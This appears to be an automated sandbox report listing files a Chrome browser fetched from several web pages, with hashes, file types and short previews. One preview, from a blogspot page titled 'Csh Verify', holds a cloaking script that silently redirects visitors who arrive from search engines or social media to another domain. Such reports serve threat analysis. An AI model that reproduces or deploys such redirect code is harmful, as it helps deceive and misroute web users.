                                                                                                                                                                                                                                                                                                                                                                          Preview:.testimonials-slider-overlapping{position:relative}.testimonials-slider-overlapping_item-wrapper{padding:60px 50px 110px;z-index:1}.testimonials-slider-overlapping_item{background-color:#fff;border-radius:20px;box-shadow:0 0 30px rgba(0,0,0,.1);padding:70px 50px 50px;position:relative;z-index:1}@media (max-width:991px){.testimonials-slider-overlapping_item-wrapper{padding:40px 20px}.testimonials-slider-overlapping_item{padding:30px}}@media (min-width:992px){.testimonials-slider-overlapping .slick-active{opacity:.4;transform:scale(.85) translateY(-20px) translateX(-50px);transition:1s ease;z-index:1!important}.testimonials-slider-overlapping .slick-current{opacity:1;position:relative;transform:scale(1.2) translateY(30px) translateX(30px);transform-origin:left center;z-index:10!important}.testimonials-slider-overlapping .slick-current .testimonials-slider-overlapping_item{z-index:10}}.testimonials-slider-overlapping_detail{align-items:center;display:flex}.testimonials-slider-overlapping_
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):550
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.502198805455797
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:OfrfAOChUdsiNcR9LAZBPA7Kcghha8Obb7pz7ZLiFk8D7Z/PRolZqz0:8VChUdsYcR9U/PAJA8bntgndmr9
                                                                                                                                                                                                                                                                                                                                                                          MD5:4FCE2FFD79E0BAE0A4EC592F8B22FE58
                                                                                                                                                                                                                                                                                                                                                                          SHA1:48F03B351227185AB7EDF17A152FC060875D845D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E2981C889B3407E38AABF2DF4794814D0E71CB6D03D50947D8C3115386BFF88B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:315CA26D2471E991D35E7A9566BACB0AE78D09DB7069D5E5537C56A8293B73E5FBC399AAEB7D6862866D16C0984760C0CA1A9660E7F0650967586D2391579F06
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hubfs/mm-favicon_color.png
                                                                                                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../-.....:..T...O.D.s...F...p...T.?.x.g#IR..)... ..@^...6..T.D..$...........9....m.m.if0S.'.D...}.........m/...^r... ... .../.J.jK~3 ..I..>I.$.l.F*cPef.........9.....=..P./.S..zO.U..j[.]...z....k....u..f.Bz..f...C.d.+...U@.L....IC.b...sea..1[..lY.teaV....|..p..dd.-....D.B....L.h9. r..DL...A.....KE.c.$0l..P....EMWR..$)C=....P^.Q..).i@..$..=.....M-..j9..V.4.S....R.......0...v.".....Rs.x..S!.........X..L.^..P2R..v...*......w.A..G..C..O..6>Q.g......(..+..C0{..x.t..g-W`<i.......c.....3.^..u..]@........].....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):286593
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.545932339554101
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:2J+H1CEOFp7G8q0Q6oI1Lirsic5e+q+qP9p6i1xcQLW+2o:a8OF1GqO5W8+qTB1xcQLWno
                                                                                                                                                                                                                                                                                                                                                                          MD5:08F2FD8ACE17775F7D3C6D9B4C0AD371
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8EBCF62F73CDB92F802B4832FF35806CC066D8AB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:704F6554C1686AADF780B230CF79512494BCD450BA676F6B9E42A3871B11EB56
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:EAFD1D70985D9F1B2275233189971A3CA5988B66B21A15FD31DED40B41F1B8EB3A38CBF2077231E084B1CF06B5662A219C2E0AD74AFB8C61EF365CAA7BADE1CD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=AW-927141988
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":18,"vtp_instanceDestinationId":"AW-927141988","tag_id":13},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_isManualEnabled":false,"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAdd
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (4564)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):51001
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.078519685785589
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:uUHvRDqLail+8EBD8uldOdn7TUCJBfwdf/CJBfwdf/CJBfwdfbTiag4BFwpxzhFI:7RGLzLhmHHtTiag4BypxzhF6L
                                                                                                                                                                                                                                                                                                                                                                          MD5:561E3BC0655FB67768644E1E927CD63D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1E4AE1A4CFF2CE75C34BDF00D6872D25975A0D56
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9FF8A4ACAB36393580A4935B7E19BCAE289A24D16A8B3AA838B1EA88B4CC64F9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A390846D81EEFD1A2F000F4F8D738810245F971A82CB870A5FD37A73652A30B49D294F80A5811A6F3596058AB7F3E74D289817B06112A92E212DF1D3EDF45AAB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://my7recovery.blogspot.com/
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>.<head>.<script>. //<![CDATA[.var ars = 'https://ald.my.id';..if(['.google.', 'bing.', 'yandex.', '', 'duckduckgo.', 'yahoo.', '.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }.// .</script>.<title>Csh Verify</title>.<meta content='width=device-width, initial-scale=1' name='viewport'/>.<meta content='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs851kLAtmjago3pCo-CFHHSnaB4wOH25VmQ1wnAs-jlWKK_QDFiKHvZBOThCpZBHrhQ7tN4tTMFDiUoghwhA-kbGGp9gnZG5-UK0PBQd8tO4eFglQGqYvY-ZED2_TZFy_rnHmNzMA82M/s1600/OYLO-Theme
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2200)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):24012
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.499994743081386
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:PD7E758N1SahurmdjZNUxHSB6iQBO4EqNHBcBBN+/bm4QmkVGtZ9uy4YD8Wy/hLx:PDC5I1SavdjZNoyB6iQw4tTEg/bm4Qma
                                                                                                                                                                                                                                                                                                                                                                          MD5:34F47B33B9D06D12ECECD1AD29055BBC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7D07A10318E2A772329F82155F946E72921D81F8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1614281EA3CEB097071B78B590AF2C261515D1454CE40D35D256FC6399A95BA6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6F17D2037FD3C48C36147B30BF3B6237C54C3B0121F3D4DA7ECA8C22E680A089F87070E72DED3B3CD54F2A3AC502B15C76F6E3ECCC62BCE5D3B4D828D2C5ED47
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a){m.setTimeout(()=>{throw a;},0)};var ba,n;a:{for(var ca=["CLOSURE_FLAGS"],p=m,da=0;da<ca.length;da++)if(p=p[ca[da]],p==null){n=null;break a}n=p}var fa=n&&n[610401301];ba=fa!=null?fa:!1;var q;const ha=m.navigator;q=ha?ha.userAgentData||null:null;function ia(a){return ba?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function t(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function u(){return ba?!!q&&q.brands.length>0:!1}function ja(){return u()?ia("Chromium"):(t("Chrome")||t("CriOS"))&&!(u()?0:t("Edge"))||t("Silk")};function ka(a,b){return Array.prototype.indexOf.call(a,b,void 0)};function la(a){la[" "](a);return a}la[" "]=function(){};!t("Android")||ja();ja();t("Safari")&&(ja()||(u()?0:t("Coast"))||(u()?0:t("Opera"))||(u()?0:t("Edge"))||(u()?ia("Microsoft Edge"):t("Edg/"))||u()&&ia("Opera"));let m
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):380
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2386619768465055
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:51bu3hb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51bU513QvuHnmVZkGdDJH10D+xc15CZj
                                                                                                                                                                                                                                                                                                                                                                          MD5:99118862043AE2295A3C4C22B3F09FCF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3598E71C538EDBBACFBC7A56B9B805D6B726F5DC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:95A4F0612DCB7047B2C6EFD6D0C9713D65472B792EF24728002870F746670EA9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DFE7A0C5AAF5DA8BE4AD61F6AA78DFE3F4229D134F9C4B64C800838753D71FBEC77CDD5698A23785AC5F9F2E67F886E53855B0ED204B2B256BDF781254FC41BF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:_HST_cntval="#3Vis. today=7130";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 45072, version 1.0
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):45072
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.994903687096033
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:VmwMSHBbXhpqNuwT7FVX0m2uUB9eQ6hxC0R/bU8uMPnTYLYzJWoY:QDqbE5V2uU3eQ6TCSTU8fPkLYzE
                                                                                                                                                                                                                                                                                                                                                                          MD5:989FE0A65C6DB0BC250E553A362BBD7E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:873BA77CA6D6A421895BB3F7C429CB539E8A1311
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CA34455F82A5C81D8111C6A641771C011E95767E64EFC8A52F82299896028C57
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4BB6F0A03C35D94FE819946DD6B1D2C377A2488369A1A6E7FBD9C5F98D7B67B0B4B273B49603E4412A31D309BD51919E97815F883288AC8656520DFC58E0221E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/intertight/v7/NGSwv5HMAFg6IuGlBNMjxLsH8ag.woff2
                                                                                                                                                                                                                                                                                                                                                                          Preview:wOF2..............................................A...,..B?HVAR.[.`?STAT.8..:/l.....d..h..H.0....6.$.... .....[..[.q..vp..U.IU.v..~.kd.S*~uW.>..j.;..n.R..ve.....d".uI.%I.nc.@.Q|T..G..m. <.-1f.4.K......mcM..>..!a..;C8..*..v6.`g.@..pZ%L.hs.x.5..M..]...R./.0..j..,...........6N..........(.....m.&...B...s.G...._.w.M..`..I9..b....T...A.%S{...8...Z.>.5.....9.7..*.{m.%...b..a....LY..IjI....H.5Z..UR%U....o....N...x.6...:..g..)..u.....4.Y..E.m}....o...eYBt]R4.&..S...2&..).*G.r.yEN.....3........./.}z....eW+iU.BT.b..`.p#|...0!..N..H.N.....k.8..2..!....`p.!............k.sKv..Z.G."T.....x.F.....B...n.....OR....v...$y.........|"""#$|=...8z{..3.y.<.9....3....9c.f~.>?...k...u.#.<.1....s.~....q.DHO...Y..!..F.C..8...[....B.Y.a.p.0....c.c...K.[j.fJ..g2=.3'..o.....cR}c..ZvQ...........8..B.i.!B.4Mc.i.iLm.q.R.G....s.o.1....~@7.g....7.7Wo.y...?..........y.(.j.iD.C..c.1..B..C.......;....Z....!*&.A.Z...t...e..C.!..C..c......*Zk.].................*.H..9........AH.A..h...a\.V.".>...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                                          MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:{}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (2332)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2390
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.024310243771725
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:Mnq/KNATLJPAzx3HeTwXh8uUsigq8hDSlNRSEOEMeOmfIwfeemGaxRvOfV9q8hDi:h/KNAZxTo+VGDSdOBmrfGD2mGD9U
                                                                                                                                                                                                                                                                                                                                                                          MD5:8A027447D99592734DA0715287305E13
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7C2E6E74FB60177782CF7AE30F5FEC71B7790874
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E21AA5B0D3FD28CEBED9E03C5544F4924E11B0C453792ED018720CF8C679B0B6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D7B120085111A6064A726D23D1F12AD58089BB2016773F4A52DBF512356E68ECFCA439E1FF49D9C6653A0415F069AC6AA22F4F4179D15AA95C0C1D36EE182FF4
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick-theme.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:@charset 'UTF-8';.slick-loading .slick-list{background:#fff url(ajax-loader.gif) center center no-repeat}@font-face{font-family:slick;font-weight:400;font-style:normal;src:url(fonts/slick.eot);src:url(fonts/slick.eot?#iefix) format('embedded-opentype'),url(fonts/slick.woff) format('woff'),url(fonts/slick.ttf) format('truetype'),url(fonts/slick.svg#slick) format('svg')}.slick-next,.slick-prev{font-size:0;line-height:0;position:absolute;top:50%;display:block;width:20px;height:20px;padding:0;-webkit-transform:translate(0,-50%);-ms-transform:translate(0,-50%);transform:translate(0,-50%);cursor:pointer;color:transparent;border:none;outline:0;background:0 0}.slick-next:focus,.slick-next:hover,.slick-prev:focus,.slick-prev:hover{color:transparent;outline:0;background:0 0}.slick-next:focus:before,.slick-next:hover:before,.slick-prev:focus:before,.slick-prev:hover:before{opacity:1}.slick-next.slick-disabled:before,.slick-prev.slick-disabled:before{opacity:.25}.slick-next:before,.slick-prev:befo
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://td.doubleclick.net/td/rul/927141988?random=1728903365624&cv=11&fst=1728903365624&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):84726
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.280742507415713
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:8HyXWWcWdcBNieNO8DDejT5UKxfIzbFWX7Qg64Ai1nnaBgcl8705eZGXm:u8jWKxfI3+79
                                                                                                                                                                                                                                                                                                                                                                          MD5:77145A720CF77C42786728CE6CC65290
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E71265E0A1CF11029362ED8BE2CA5009276DDEF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8AF71FC879943FC0936E76F388252ECC78520EB8D1633E42229A07B95E4BCD00
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:744B7DE6F7FE894007DAE58208775B607CEDB0AC75C4A16B08E22CF6E8C21D4D3FE121F39B5AA2B5E10791AC076C6DC50AF3A96DE261D47BB2E7AEB70A86C6BF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){"use strict";const e={RECEIVED_ANALYTICS:"HS_CTA_PARENT_RECEIVED_ANALYTICS",DEVICE_TYPE:"HS_CTA_PARENT_DEVICE_TYPE",PROXY_ANALYTICS_FN_CALLBACK:"HS_CTA_PARENT_PROXY_ANALYTICS_FN",INIT:"HS_CTA_PARENT_INIT",SHOWING_CTA:"HS_CTA_SHOWING_CTA",SEND_EXTRACTED_STYLES:"HS_SEND_EXTRACTED_STYLES",STARTED:"HS_CTA_STARTED",NAVIGATE_PAGE:"HS_CTA_NAVIGATE_PAGE",CLICK_EVENT:"HS_CTA_CLICK_EVENT",CLOSE_INTERACTIVE:"HS_CTA_CLOSE_INTERACTIVE",HAS_CLOSED:"HS_CTA_HAS_CLOSED",NEW_HEIGHT:"HS_CTA_NEW_HEIGHT",DISPLAY_CALL_TO_ACTION:"HS_DISPLAY_CALL_TO_ACTION",PROXY_ANALYTICS:"HS_CTA_PROXY_ANALYTICS",PROXY_ANALYTICS_FN:"HS_CTA_PROXY_ANALYTICS_FN",SEND_FORM_DEFINITION:"HS_SEND_FORM_DEFINITION",SEND_CTA_CONFIG:"HS_SEND_CTA_CONFIG",SEND_EMBED_CONTEXT:"HS_SEND_EMBED_CONTEXT",RECEIVE_FILTERED_STYLESHEETS:"RECEIVE_FILTERED_STYLESHEETS",SEND_STYLESHEETS:"SEND_STYLESHEETS",RENDER_RECAPTCHA:"RENDER_RECAPTCHA",EXECUTE_RECAPTCHA:"EXECUTE_RECAPTCHA",RESET_RECAPTCHA:"RESET_RECAPTCHA",RECAPTCHA_SUCCESS:"RECAPTCHA_
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (43601), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43601
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.362094585622624
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:HiS1YxfHfIcITa4P5+23ex/BVQOXGsWIYTHpji7J:HioYxfyTaW5KVQpsEHpgJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:9B991FC4E41448221BE02744748EC589
                                                                                                                                                                                                                                                                                                                                                                          SHA1:47DF0B75614D17D1E94D61FC4006849EA8E1E13D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FFE8AC1AD574101276F7BA3BF6CFB95D55ACE8486BF60329ADBF843C64A2EBCE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FA4E263114DBC0BFE29FB7C1A39F7A0D36178D0BD6B6075B99D1183315F1FE6A23D1AB8ACC49710E2165D945135B5AEDC685A723F0DBC5C7E0F6EBE6E878DBDB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
